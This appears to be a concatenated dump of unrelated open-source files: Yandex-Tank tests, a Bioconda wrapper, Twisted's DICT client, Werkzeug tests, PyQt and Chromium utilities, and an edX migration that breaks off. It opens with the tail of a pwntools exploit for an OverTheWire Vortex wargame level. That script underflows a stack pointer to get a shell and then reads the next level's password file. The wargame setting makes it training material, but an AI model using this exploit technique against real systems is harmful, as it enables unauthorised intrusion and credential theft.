binary = '/vortex/%s' % chal
shell = ssh(host=host, user=user, password=password)
r = shell.run(binary)
# Stack layout looks like this:
# -00000214 ptr dd ?
# -00000210 char dd ?
# -0000020C buffer db 512 dup(?)
#
# We start out in the middle of buffer
off_buffer = -0x20c
off_ptr = -0x214
ptr = off_buffer+0x100
r.send('\\' * (ptr-off_ptr-3)) # Underflow PTR, -3 so we set the high byte.
r.send('\xca') # Write the byte
r.send('\\') # Move backward again to undo the ++
r.send('\xca') # Send any byte at all, triggers e()
r.clean()
time.sleep(1)
# Win
r.send('id\n')
log.success('id: %s' % r.recv().strip())
r.send('cat /etc/vortex_pass/vortex2\n')
password = r.recv().strip()
log.success('Password: %s' % password)
print password
| mit |
fomars/yandex-tank | yandextank/plugins/Telegraf/tests/test_config.py | 3 | 3741 | from yandextank.plugins.Telegraf.config import ConfigManager, AgentConfig
import sys
if sys.version_info[0] < 3:
from ConfigParser import ConfigParser
else:
from configparser import ConfigParser
class TestConfigManager(object):
def test_rawxml_parse(self):
""" raw xml read from string """
manager = ConfigManager()
config = """
<Monitoring>
<Host>
<CPU feature="passed"/>
</Host>
</Monitoring>
"""
etree = manager.parse_xml(config)
host = etree.findall('Host')[0]
assert (host[0].tag == 'CPU')
def test_xml_old_parse(self):
""" old-style monitoring xml parse """
manager = ConfigManager()
configs = manager.getconfig(
'yandextank/plugins/Telegraf/tests/old_mon.xml', 'sometargethint')
assert (
configs[0]['host'] == 'somehost.yandex.tld'
and configs[0]['host_config']['CPU']['name'] == '[inputs.cpu]')
def test_xml_telegraf_parse(self):
""" telegraf-style monitoring xml parse """
manager = ConfigManager()
configs = manager.getconfig(
'yandextank/plugins/Telegraf/tests/telegraf_mon.xml',
'sometargethint')
assert (
configs[0]['host'] == 'somehost.yandex.tld'
and configs[0]['host_config']['CPU']['name'] == '[inputs.cpu]')
def test_target_hint(self):
""" test target hint (special address=[target] option) """
manager = ConfigManager()
configs = manager.getconfig(
'yandextank/plugins/Telegraf/tests/target_hint.xml',
'somehost.yandex.tld')
assert (configs[0]['host'] == 'somehost.yandex.tld')
class TestAgentConfig(object):
def test_create_startup_configs(self):
""" test agent config creates startup config """
manager = ConfigManager()
telegraf_configs = manager.getconfig(
'yandextank/plugins/Telegraf/tests/telegraf_mon.xml',
'sometargethint')
agent_config = AgentConfig(telegraf_configs[0], False)
startup = agent_config.create_startup_config()
cfg_parser = ConfigParser()
cfg_parser.read(startup)
assert cfg_parser.has_section('startup')
def test_create_collector_configs(self):
""" test agent config creates collector config """
manager = ConfigManager()
telegraf_configs = manager.getconfig(
'yandextank/plugins/Telegraf/tests/telegraf_mon.xml',
'sometargethint')
agent_config = AgentConfig(telegraf_configs[0], False)
remote_workdir = '/path/to/workdir/temp'
collector_config = agent_config.create_collector_config(remote_workdir)
cfg_parser = ConfigParser()
cfg_parser.read(collector_config)
assert (
cfg_parser.has_section('agent')
and cfg_parser.get('agent', 'interval') == "'1s'"
and cfg_parser.has_section('[outputs.file')
and cfg_parser.get('[outputs.file', 'files')
== "['{rmt}/monitoring.rawdata']".format(rmt=remote_workdir))
def test_create_custom_exec_script(self):
""" test agent config creates custom_exec config """
manager = ConfigManager()
telegraf_configs = manager.getconfig(
'yandextank/plugins/Telegraf/tests/telegraf_mon.xml',
'sometargethint')
agent_config = AgentConfig(telegraf_configs[0], False)
custom_exec_config = agent_config.create_custom_exec_script()
with open(custom_exec_config, 'r') as custom_fname:
data = custom_fname.read()
assert (data.find("-0) curl -s 'http://localhost:6100/stat'") != -1)
| lgpl-2.1 |
jasper1918/bioconda-recipes | recipes/mz_to_sqlite/mz_to_sqlite.py | 60 | 3265 | #!/usr/bin/env python
#
# Wrapper script for Java Conda packages that ensures that the java runtime
# is invoked with the right options. Adapted from the bash script (http://stackoverflow.com/questions/59895/can-a-bash-script-tell-what-directory-its-stored-in/246128#246128).
#
# Program Parameters
#
import os
import subprocess
import sys
import shutil
from os import access
from os import getenv
from os import X_OK
jar_file = 'mzToSQLite-1.2.0.jar'
default_jvm_mem_opts = ['-Xms512m', '-Xmx1g']
# !!! End of parameter section. No user-serviceable code below this line !!!
def real_dirname(path):
"""Return the symlink-resolved, canonicalized directory-portion of path."""
return os.path.dirname(os.path.realpath(path))
def java_executable():
"""Return the executable name of the Java interpreter."""
java_home = getenv('JAVA_HOME')
java_bin = os.path.join('bin', 'java')
if java_home and access(os.path.join(java_home, java_bin), X_OK):
return os.path.join(java_home, java_bin)
else:
return 'java'
def jvm_opts(argv):
"""Construct list of Java arguments based on our argument list.
The argument list passed in argv must not include the script name.
The return value is a 3-tuple lists of strings of the form:
(memory_options, prop_options, passthrough_options)
"""
mem_opts = []
prop_opts = []
pass_args = []
exec_dir = None
for arg in argv:
if arg.startswith('-D'):
prop_opts.append(arg)
elif arg.startswith('-XX'):
prop_opts.append(arg)
elif arg.startswith('-Xm'):
mem_opts.append(arg)
elif arg.startswith('--exec_dir='):
exec_dir = arg.split('=')[1].strip('"').strip("'")
if not os.path.exists(exec_dir):
shutil.copytree(real_dirname(sys.argv[0]), exec_dir, symlinks=False, ignore=None)
else:
pass_args.append(arg)
# In the original shell script the test coded below read:
# if [ "$jvm_mem_opts" == "" ] && [ -z ${_JAVA_OPTIONS+x} ]
# To reproduce the behaviour of the above shell code fragment
# it is important to explictly check for equality with None
# in the second condition, so a null envar value counts as True!
if mem_opts == [] and getenv('_JAVA_OPTIONS') is None:
mem_opts = default_jvm_mem_opts
return (mem_opts, prop_opts, pass_args, exec_dir)
def main():
java = java_executable()
"""
mz_to_sqlite updates files relative to the path of the jar file.
In a multiuser setting, the option --exec_dir="exec_dir"
can be used as the location for the peptide-shaker distribution.
If the exec_dir dies not exist,
we copy the jar file, lib, and resources to the exec_dir directory.
"""
(mem_opts, prop_opts, pass_args, exec_dir) = jvm_opts(sys.argv[1:])
jar_dir = exec_dir if exec_dir else real_dirname(sys.argv[0])
if pass_args != [] and pass_args[0].startswith('eu'):
jar_arg = '-cp'
else:
jar_arg = '-jar'
jar_path = os.path.join(jar_dir, jar_file)
java_args = [java] + mem_opts + prop_opts + [jar_arg] + [jar_path] + pass_args
sys.exit(subprocess.call(java_args))
if __name__ == '__main__':
main()
| mit |
BNCrew/kernel-3.0.29 | Documentation/networking/cxacru-cf.py | 14668 | 1626 | #!/usr/bin/env python
# Copyright 2009 Simon Arlott
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 59
# Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# Usage: cxacru-cf.py < cxacru-cf.bin
# Output: values string suitable for the sysfs adsl_config attribute
#
# Warning: cxacru-cf.bin with MD5 hash cdbac2689969d5ed5d4850f117702110
# contains mis-aligned values which will stop the modem from being able
# to make a connection. If the first and last two bytes are removed then
# the values become valid, but the modulation will be forced to ANSI
# T1.413 only which may not be appropriate.
#
# The original binary format is a packed list of le32 values.
import sys
import struct
i = 0
while True:
buf = sys.stdin.read(4)
if len(buf) == 0:
break
elif len(buf) != 4:
sys.stdout.write("\n")
sys.stderr.write("Error: read {0} not 4 bytes\n".format(len(buf)))
sys.exit(1)
if i > 0:
sys.stdout.write(" ")
sys.stdout.write("{0:x}={1}".format(i, struct.unpack("<I", buf)[0]))
i += 1
sys.stdout.write("\n")
| gpl-2.0 |
brunoabud/ic | imagem_cinematica.py | 1 | 2735 | #!/usr/bin/env python
# coding: latin-1
# Imagem Cinemática is a free software intended to be used as a tool for teachers
# and students. It utilizes Computer Vision techniques to extract the trajectory
# of moving objects from video data.
#
# The code contained in this project follows the Google Python Style Guide
# Revision 2.59.
# The specifics can be found at http://google.github.io/styleguide/pyguide.html
#
#
# Copyright (C) 2016 Bruno Abude Cardoso
#
# Imagem Cinemática is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Imagem Cinemática is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Module responsible for loading the main components of the application.
"""
import sys
import logging
import os
from PyQt4.QtGui import QApplication
from PyQt4.QtCore import Qt
from ic import log as ic_log
LOG = None
def create_logger():
"""Set up the logging utility, using the formatter that best matches the OS.
"""
global LOG
handler = logging.StreamHandler()
root_logger = logging.getLogger()
if sys.platform == "linux2":
handler.setFormatter(ic_log.ANSIFormatter())
else:
handler.setFormatter(ic_log.ColorlessFormatter())
root_logger.addHandler(handler)
handler.setLevel(logging.DEBUG)
root_logger.setLevel(logging.NOTSET)
# Filter out the annoying PyQt4 logging messages
handler.addFilter(ic_log.NameFilter("PyQt4"))
LOG = logging.getLogger(__name__)
def main():
from gui import application
from gui import main_window
from ic import engine
from ic import plugin
from ic import settings
from ic import messages
settings.change("app_path", sys.path[0])
app = application.Application(sys.argv)
messages.start_timer()
mainwindow = main_window.MainWindow()
desktop = QApplication.desktop().screen()
mainwindow.show()
mainwindow.move(mainwindow.frameGeometry().left()-mainwindow.geometry().left(), 0)
mainwindow.resize(desktop.frameGeometry().width(), 150)
bordas = mainwindow.frameGeometry().width() - mainwindow.geometry().width()
mainwindow.filter_rack_window.move(0, mainwindow.frameGeometry().bottom())
app.exec_()
if __name__ == "__main__":
create_logger()
main()
| gpl-3.0 |
CenterForOpenScience/osf.io | api_tests/taxonomies/views/test_taxonomy_list.py | 15 | 4498 | import pytest
from django.db.models import BooleanField, Case, When
from api.base.settings.defaults import API_BASE
from osf.models import Subject
from osf_tests.factories import SubjectFactory
@pytest.mark.django_db
class TestTaxonomy:
@pytest.fixture(autouse=True)
def subject(self):
return SubjectFactory(text='A')
@pytest.fixture(autouse=True)
def subject_other(self):
return SubjectFactory(text='Other Sub')
@pytest.fixture(autouse=True)
def subject_a(self):
return SubjectFactory(text='Z')
@pytest.fixture(autouse=True)
def subject_child_one(self, subject):
return SubjectFactory(parent=subject)
@pytest.fixture(autouse=True)
def subject_child_two(self, subject):
return SubjectFactory(parent=subject)
@pytest.fixture()
def subjects(self):
return Subject.objects.all().annotate(is_other=Case(
When(text__istartswith='other', then=True),
default=False,
output_field=BooleanField()
)).order_by('is_other', 'text')
@pytest.fixture()
def url_subject_list(self):
return '/{}taxonomies/'.format(API_BASE)
@pytest.fixture()
def res_subject_list(self, app, url_subject_list):
return app.get(url_subject_list)
@pytest.fixture()
def data_subject_list(self, app, res_subject_list):
return res_subject_list.json['data']
def test_taxonomy_other_ordering(self, subject_other, data_subject_list):
assert data_subject_list[-1]['id'] == subject_other._id
def test_taxonomy_success(
self, subject, subject_child_one, subject_child_two,
subjects, res_subject_list):
# make sure there are subjects to filter through
assert len(subjects) > 0
assert res_subject_list.status_code == 200
assert res_subject_list.content_type == 'application/vnd.api+json'
def test_taxonomy_text(self, subjects, data_subject_list):
for index, subject in enumerate(subjects):
if index >= len(data_subject_list):
break # only iterate though first page of results
assert data_subject_list[index]['attributes']['text'] == subject.text
def test_taxonomy_parents(self, subjects, data_subject_list):
for index, subject in enumerate(subjects):
if index >= len(data_subject_list):
break
parents_ids = []
for parent in data_subject_list[index]['attributes']['parents']:
parents_ids.append(parent['id'])
if subject.parent:
assert subject.parent._id in parents_ids
def test_taxonomy_filter_top_level(
self, app, subject, subject_child_one,
subject_child_two, url_subject_list):
top_level_subjects = Subject.objects.filter(parent__isnull=True)
top_level_url = '{}?filter[parents]=null'.format(url_subject_list)
res = app.get(top_level_url)
assert res.status_code == 200
data = res.json['data']
assert len(top_level_subjects) == len(data)
assert len(top_level_subjects) > 0
for subject in data:
assert subject['attributes']['parents'] == []
def test_taxonomy_filter_by_parent(self, app, url_subject_list, subject):
children_subjects = Subject.objects.filter(parent__id=subject.id)
children_url = '{}?filter[parents]={}'.format(
url_subject_list, subject._id)
res = app.get(children_url)
assert res.status_code == 200
data = res.json['data']
assert len(children_subjects) == len(data)
for subject_ in data:
parents_ids = []
for parent in subject_['attributes']['parents']:
parents_ids.append(parent['id'])
assert subject._id in parents_ids
def test_is_deprecated(self, app, url_subject_list):
res = app.get(
'{}?version=2.6'.format(url_subject_list),
expect_errors=True)
assert res.status_code == 404
def test_taxonomy_path(self, data_subject_list):
for item in data_subject_list:
subj = Subject.objects.get(_id=item['id'])
path_parts = item['attributes']['path'].split('|')
assert path_parts[0] == subj.provider.share_title
for index, text in enumerate(
[s.text for s in subj.object_hierarchy]):
assert path_parts[index + 1] == text
| apache-2.0 |
dgsantana/arsenalsuite | cpp/lib/PyQt4/pyuic/uic/icon_cache.py | 8 | 5431 | #############################################################################
##
## Copyright (c) 2012 Riverbank Computing Limited <info@riverbankcomputing.com>
##
## This file is part of PyQt.
##
## This file may be used under the terms of the GNU General Public
## License versions 2.0 or 3.0 as published by the Free Software
## Foundation and appearing in the files LICENSE.GPL2 and LICENSE.GPL3
## included in the packaging of this file. Alternatively you may (at
## your option) use any later version of the GNU General Public
## License if such license has been publicly approved by Riverbank
## Computing Limited (or its successors, if any) and the KDE Free Qt
## Foundation. In addition, as a special exception, Riverbank gives you
## certain additional rights. These rights are described in the Riverbank
## GPL Exception version 1.1, which can be found in the file
## GPL_EXCEPTION.txt in this package.
##
## If you are unsure which license is appropriate for your use, please
## contact the sales department at sales@riverbankcomputing.com.
##
## This file is provided AS IS with NO WARRANTY OF ANY KIND, INCLUDING THE
## WARRANTY OF DESIGN, MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
##
#############################################################################
import sys
import os.path
if sys.hexversion >= 0x03000000:
from PyQt4.uic.port_v3.as_string import as_string
else:
from PyQt4.uic.port_v2.as_string import as_string
class IconCache(object):
"""Maintain a cache of icons. If an icon is used more than once by a GUI
then ensure that only one copy is created.
"""
def __init__(self, object_factory, qtgui_module):
"""Initialise the cache."""
self._object_factory = object_factory
self._qtgui_module = qtgui_module
self._base_dir = ''
self._cache = []
def set_base_dir(self, base_dir):
""" Set the base directory to be used for all relative filenames. """
self._base_dir = base_dir
def get_icon(self, iconset):
"""Return an icon described by the given iconset tag."""
# Handle a themed icon.
theme = iconset.attrib.get('theme')
if theme is not None:
return self._object_factory.createQObject("QIcon.fromTheme",
'icon', (as_string(theme), ), is_attribute=False)
# Handle an empty iconset property.
if iconset.text is None:
return None
iset = _IconSet(iconset, self._base_dir)
try:
idx = self._cache.index(iset)
except ValueError:
idx = -1
if idx >= 0:
# Return the icon from the cache.
iset = self._cache[idx]
else:
# Follow uic's naming convention.
name = 'icon'
idx = len(self._cache)
if idx > 0:
name += str(idx)
icon = self._object_factory.createQObject("QIcon", name, (),
is_attribute=False)
iset.set_icon(icon, self._qtgui_module)
self._cache.append(iset)
return iset.icon
class _IconSet(object):
"""An icon set, ie. the mode and state and the pixmap used for each."""
def __init__(self, iconset, base_dir):
"""Initialise the icon set from an XML tag."""
# Set the pre-Qt v4.4 fallback (ie. with no roles).
self._fallback = self._file_name(iconset.text, base_dir)
self._use_fallback = True
# Parse the icon set.
self._roles = {}
for i in iconset:
file_name = i.text
if file_name is not None:
file_name = self._file_name(file_name, base_dir)
self._roles[i.tag] = file_name
self._use_fallback = False
# There is no real icon yet.
self.icon = None
@staticmethod
def _file_name(fname, base_dir):
""" Convert a relative filename if we have a base directory. """
fname = fname.replace("\\", "\\\\")
if base_dir != '' and fname[0] != ':' and not os.path.isabs(fname):
fname = os.path.join(base_dir, fname)
return fname
def set_icon(self, icon, qtgui_module):
"""Save the icon and set its attributes."""
if self._use_fallback:
icon.addFile(self._fallback)
else:
for role, pixmap in self._roles.items():
if role.endswith("off"):
mode = role[:-3]
state = qtgui_module.QIcon.Off
elif role.endswith("on"):
mode = role[:-2]
state = qtgui_module.QIcon.On
else:
continue
mode = getattr(qtgui_module.QIcon, mode.title())
if pixmap:
icon.addPixmap(qtgui_module.QPixmap(pixmap), mode, state)
else:
icon.addPixmap(qtgui_module.QPixmap(), mode, state)
self.icon = icon
def __eq__(self, other):
"""Compare two icon sets for equality."""
if not isinstance(other, type(self)):
return NotImplemented
if self._use_fallback:
if other._use_fallback:
return self._fallback == other._fallback
return False
if other._use_fallback:
return False
return self._roles == other._roles
| gpl-2.0 |
bdh1011/wau | venv/lib/python2.7/site-packages/twisted/protocols/dict.py | 11 | 10728 | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Dict client protocol implementation.
@author: Pavel Pergamenshchik
"""
from twisted.protocols import basic
from twisted.internet import defer, protocol
from twisted.python import log
from StringIO import StringIO
def parseParam(line):
"""Chew one dqstring or atom from beginning of line and return (param, remaningline)"""
if line == '':
return (None, '')
elif line[0] != '"': # atom
mode = 1
else: # dqstring
mode = 2
res = ""
io = StringIO(line)
if mode == 2: # skip the opening quote
io.read(1)
while 1:
a = io.read(1)
if a == '"':
if mode == 2:
io.read(1) # skip the separating space
return (res, io.read())
elif a == '\\':
a = io.read(1)
if a == '':
return (None, line) # unexpected end of string
elif a == '':
if mode == 1:
return (res, io.read())
else:
return (None, line) # unexpected end of string
elif a == ' ':
if mode == 1:
return (res, io.read())
res += a
def makeAtom(line):
"""Munch a string into an 'atom'"""
# FIXME: proper quoting
return filter(lambda x: not (x in map(chr, range(33)+[34, 39, 92])), line)
def makeWord(s):
mustquote = range(33)+[34, 39, 92]
result = []
for c in s:
if ord(c) in mustquote:
result.append("\\")
result.append(c)
s = "".join(result)
return s
def parseText(line):
if len(line) == 1 and line == '.':
return None
else:
if len(line) > 1 and line[0:2] == '..':
line = line[1:]
return line
class Definition:
"""A word definition"""
def __init__(self, name, db, dbdesc, text):
self.name = name
self.db = db
self.dbdesc = dbdesc
self.text = text # list of strings not terminated by newline
class DictClient(basic.LineReceiver):
"""dict (RFC2229) client"""
data = None # multiline data
MAX_LENGTH = 1024
state = None
mode = None
result = None
factory = None
def __init__(self):
self.data = None
self.result = None
def connectionMade(self):
self.state = "conn"
self.mode = "command"
def sendLine(self, line):
"""Throw up if the line is longer than 1022 characters"""
if len(line) > self.MAX_LENGTH - 2:
raise ValueError("DictClient tried to send a too long line")
basic.LineReceiver.sendLine(self, line)
def lineReceived(self, line):
try:
line = line.decode("UTF-8")
except UnicodeError: # garbage received, skip
return
if self.mode == "text": # we are receiving textual data
code = "text"
else:
if len(line) < 4:
log.msg("DictClient got invalid line from server -- %s" % line)
self.protocolError("Invalid line from server")
self.transport.LoseConnection()
return
code = int(line[:3])
line = line[4:]
method = getattr(self, 'dictCode_%s_%s' % (code, self.state), self.dictCode_default)
method(line)
def dictCode_default(self, line):
"""Unknown message"""
log.msg("DictClient got unexpected message from server -- %s" % line)
self.protocolError("Unexpected server message")
self.transport.loseConnection()
def dictCode_221_ready(self, line):
"""We are about to get kicked off, do nothing"""
pass
def dictCode_220_conn(self, line):
"""Greeting message"""
self.state = "ready"
self.dictConnected()
def dictCode_530_conn(self):
self.protocolError("Access denied")
self.transport.loseConnection()
def dictCode_420_conn(self):
self.protocolError("Server temporarily unavailable")
self.transport.loseConnection()
def dictCode_421_conn(self):
self.protocolError("Server shutting down at operator request")
self.transport.loseConnection()
def sendDefine(self, database, word):
"""Send a dict DEFINE command"""
assert self.state == "ready", "DictClient.sendDefine called when not in ready state"
self.result = None # these two are just in case. In "ready" state, result and data
self.data = None # should be None
self.state = "define"
command = "DEFINE %s %s" % (makeAtom(database.encode("UTF-8")), makeWord(word.encode("UTF-8")))
self.sendLine(command)
def sendMatch(self, database, strategy, word):
"""Send a dict MATCH command"""
assert self.state == "ready", "DictClient.sendMatch called when not in ready state"
self.result = None
self.data = None
self.state = "match"
command = "MATCH %s %s %s" % (makeAtom(database), makeAtom(strategy), makeAtom(word))
self.sendLine(command.encode("UTF-8"))
def dictCode_550_define(self, line):
"""Invalid database"""
self.mode = "ready"
self.defineFailed("Invalid database")
def dictCode_550_match(self, line):
"""Invalid database"""
self.mode = "ready"
self.matchFailed("Invalid database")
def dictCode_551_match(self, line):
"""Invalid strategy"""
self.mode = "ready"
self.matchFailed("Invalid strategy")
def dictCode_552_define(self, line):
"""No match"""
self.mode = "ready"
self.defineFailed("No match")
def dictCode_552_match(self, line):
"""No match"""
self.mode = "ready"
self.matchFailed("No match")
def dictCode_150_define(self, line):
"""n definitions retrieved"""
self.result = []
def dictCode_151_define(self, line):
"""Definition text follows"""
self.mode = "text"
(word, line) = parseParam(line)
(db, line) = parseParam(line)
(dbdesc, line) = parseParam(line)
if not (word and db and dbdesc):
self.protocolError("Invalid server response")
self.transport.loseConnection()
else:
self.result.append(Definition(word, db, dbdesc, []))
self.data = []
def dictCode_152_match(self, line):
"""n matches found, text follows"""
self.mode = "text"
self.result = []
self.data = []
def dictCode_text_define(self, line):
"""A line of definition text received"""
res = parseText(line)
if res == None:
self.mode = "command"
self.result[-1].text = self.data
self.data = None
else:
self.data.append(line)
def dictCode_text_match(self, line):
"""One line of match text received"""
def l(s):
p1, t = parseParam(s)
p2, t = parseParam(t)
return (p1, p2)
res = parseText(line)
if res == None:
self.mode = "command"
self.result = map(l, self.data)
self.data = None
else:
self.data.append(line)
def dictCode_250_define(self, line):
"""ok"""
t = self.result
self.result = None
self.state = "ready"
self.defineDone(t)
def dictCode_250_match(self, line):
"""ok"""
t = self.result
self.result = None
self.state = "ready"
self.matchDone(t)
def protocolError(self, reason):
"""override to catch unexpected dict protocol conditions"""
pass
def dictConnected(self):
"""override to be notified when the server is ready to accept commands"""
pass
def defineFailed(self, reason):
"""override to catch reasonable failure responses to DEFINE"""
pass
def defineDone(self, result):
"""override to catch succesful DEFINE"""
pass
def matchFailed(self, reason):
"""override to catch resonable failure responses to MATCH"""
pass
def matchDone(self, result):
"""override to catch succesful MATCH"""
pass
class InvalidResponse(Exception):
pass
class DictLookup(DictClient):
"""Utility class for a single dict transaction. To be used with DictLookupFactory"""
def protocolError(self, reason):
if not self.factory.done:
self.factory.d.errback(InvalidResponse(reason))
self.factory.clientDone()
def dictConnected(self):
if self.factory.queryType == "define":
apply(self.sendDefine, self.factory.param)
elif self.factory.queryType == "match":
apply(self.sendMatch, self.factory.param)
def defineFailed(self, reason):
self.factory.d.callback([])
self.factory.clientDone()
self.transport.loseConnection()
def defineDone(self, result):
self.factory.d.callback(result)
self.factory.clientDone()
self.transport.loseConnection()
def matchFailed(self, reason):
self.factory.d.callback([])
self.factory.clientDone()
self.transport.loseConnection()
def matchDone(self, result):
self.factory.d.callback(result)
self.factory.clientDone()
self.transport.loseConnection()
class DictLookupFactory(protocol.ClientFactory):
"""Utility factory for a single dict transaction"""
protocol = DictLookup
done = None
def __init__(self, queryType, param, d):
self.queryType = queryType
self.param = param
self.d = d
self.done = 0
def clientDone(self):
"""Called by client when done."""
self.done = 1
del self.d
def clientConnectionFailed(self, connector, error):
self.d.errback(error)
def clientConnectionLost(self, connector, error):
if not self.done:
self.d.errback(error)
def buildProtocol(self, addr):
p = self.protocol()
p.factory = self
return p
def define(host, port, database, word):
"""Look up a word using a dict server"""
d = defer.Deferred()
factory = DictLookupFactory("define", (database, word), d)
from twisted.internet import reactor
reactor.connectTCP(host, port, factory)
return d
def match(host, port, database, strategy, word):
"""Match a word using a dict server"""
d = defer.Deferred()
factory = DictLookupFactory("match", (database, strategy, word), d)
from twisted.internet import reactor
reactor.connectTCP(host, port, factory)
return d
| mit |
nzavagli/UnrealPy | UnrealPyEmbed/Development/Python/2015.08.07-Python2710-x64-Source-vs2015/Python27/Source/Werkzeug-0.10.4/tests/test_internal.py | 2 | 2492 | # -*- coding: utf-8 -*-
"""
tests.internal
~~~~~~~~~~~~~~
Internal tests.
:copyright: (c) 2014 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import pytest
from datetime import datetime
from warnings import filterwarnings, resetwarnings
from werkzeug.wrappers import Request, Response
from werkzeug import _internal as internal
from werkzeug.test import create_environ
def test_date_to_unix():
assert internal._date_to_unix(datetime(1970, 1, 1)) == 0
assert internal._date_to_unix(datetime(1970, 1, 1, 1, 0, 0)) == 3600
assert internal._date_to_unix(datetime(1970, 1, 1, 1, 1, 1)) == 3661
x = datetime(2010, 2, 15, 16, 15, 39)
assert internal._date_to_unix(x) == 1266250539
def test_easteregg():
req = Request.from_values('/?macgybarchakku')
resp = Response.force_type(internal._easteregg(None), req)
assert b'About Werkzeug' in resp.get_data()
assert b'the Swiss Army knife of Python web development' in resp.get_data()
def test_wrapper_internals():
req = Request.from_values(data={'foo': 'bar'}, method='POST')
req._load_form_data()
assert req.form.to_dict() == {'foo': 'bar'}
# second call does not break
req._load_form_data()
assert req.form.to_dict() == {'foo': 'bar'}
# check reprs
assert repr(req) == "<Request 'http://localhost/' [POST]>"
resp = Response()
assert repr(resp) == '<Response 0 bytes [200 OK]>'
resp.set_data('Hello World!')
assert repr(resp) == '<Response 12 bytes [200 OK]>'
resp.response = iter(['Test'])
assert repr(resp) == '<Response streamed [200 OK]>'
# unicode data does not set content length
response = Response([u'Hällo Wörld'])
headers = response.get_wsgi_headers(create_environ())
assert u'Content-Length' not in headers
response = Response([u'Hällo Wörld'.encode('utf-8')])
headers = response.get_wsgi_headers(create_environ())
assert u'Content-Length' in headers
# check for internal warnings
filterwarnings('error', category=Warning)
response = Response()
environ = create_environ()
response.response = 'What the...?'
pytest.raises(Warning, lambda: list(response.iter_encoded()))
pytest.raises(Warning, lambda: list(response.get_app_iter(environ)))
response.direct_passthrough = True
pytest.raises(Warning, lambda: list(response.iter_encoded()))
pytest.raises(Warning, lambda: list(response.get_app_iter(environ)))
resetwarnings()
| mit |
was4444/chromium.src | infra/scripts/legacy/scripts/common/chromium_utils.py | 30 | 2152 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Set of basic operations/utilities that are used by the build. """
from contextlib import contextmanager
import ast
import cStringIO
import copy
import errno
import fnmatch
import glob
import json
import os
import re
import shutil
import socket
import stat
import subprocess
import sys
import threading
import time
import traceback
BUILD_DIR = os.path.realpath(os.path.join(
os.path.dirname(__file__), os.pardir, os.pardir))
# Local errors.
class MissingArgument(Exception):
pass
class PathNotFound(Exception):
pass
class ExternalError(Exception):
pass
def IsWindows():
return sys.platform == 'cygwin' or sys.platform.startswith('win')
def IsLinux():
return sys.platform.startswith('linux')
def IsMac():
return sys.platform.startswith('darwin')
def convert_json(option, _, value, parser):
"""Provide an OptionParser callback to unmarshal a JSON string."""
setattr(parser.values, option.dest, json.loads(value))
def AddPropertiesOptions(option_parser):
"""Registers command line options for parsing build and factory properties.
After parsing, the options object will have the 'build_properties' and
'factory_properties' attributes. The corresponding values will be python
dictionaries containing the properties. If the options are not given on
the command line, the dictionaries will be empty.
Args:
option_parser: An optparse.OptionParser to register command line options
for build and factory properties.
"""
option_parser.add_option('--build-properties', action='callback',
callback=convert_json, type='string',
nargs=1, default={},
help='build properties in JSON format')
option_parser.add_option('--factory-properties', action='callback',
callback=convert_json, type='string',
nargs=1, default={},
help='factory properties in JSON format')
| bsd-3-clause |
SivilTaram/edx-platform | common/djangoapps/student/migrations/0040_auto__del_field_usersignupsource_user_id__add_field_usersignupsource_u.py | 114 | 12942 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'UserSignupSource.user_id'
db.delete_column('student_usersignupsource', 'user_id_id')
# Adding field 'UserSignupSource.user'
db.add_column('student_usersignupsource', 'user',
self.gf('django.db.models.fields.related.ForeignKey')(default=0, to=orm['auth.User']),
keep_default=False)
def backwards(self, orm):
# User chose to not deal with backwards NULL issues for 'UserSignupSource.user_id'
raise RuntimeError("Cannot reverse this migration. 'UserSignupSource.user_id' and its values cannot be restored.")
# Deleting field 'UserSignupSource.user'
db.delete_column('student_usersignupsource', 'user_id')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
